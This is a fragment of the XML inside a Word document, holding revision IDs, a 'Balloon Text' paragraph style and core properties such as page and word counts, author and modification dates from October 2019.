    <w:rsid w:val="00446D68"/>
    <w:rsid w:val="004A0092"/>
    <w:rsid w:val="004D201C"/>
    <w:rsid w:val="00544FC2"/>
    <w:rsid w:val="00573F36"/>
    <w:rsid w:val="0064495D"/>
    <w:rsid w:val="006C604D"/>
    <w:rsid w:val="006E62BC"/>
    <w:rsid w:val="006E7EC1"/>
    <w:rsid w:val="00714D8A"/>
    <w:rsid w:val="00786269"/>
    <w:rsid w:val="00872146"/>
    <w:rsid w:val="008C1811"/>
    <w:rsid w:val="00942DDD"/>
    <w:rsid w:val="00AC1654"/>
    <w:rsid w:val="00B00035"/>
    <w:rsid w:val="00B03649"/>
    <w:rsid w:val="00B14D09"/>
    <w:rsid w:val="00B3745C"/>
    <w:rsid w:val="00B62202"/>
    <w:rsid w:val="00B90BE7"/>
    <w:rsid w:val="00BF127F"/>
    <w:rsid w:val="00C11906"/>
    <w:rsid w:val="00D1703A"/>
    <w:rsid w:val="00EC7CA5"/>
    <w:rsid w:val="00F02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5014C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{607A5F58-D0D6-4F40-B7BC-52185006A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906"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D20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20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3295</TotalTime>
  <Pages>17</Pages>
  <Words>527</Words>
  <Characters>3009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Pramod</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kumar, Pramod</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-23T18:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-26T16:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>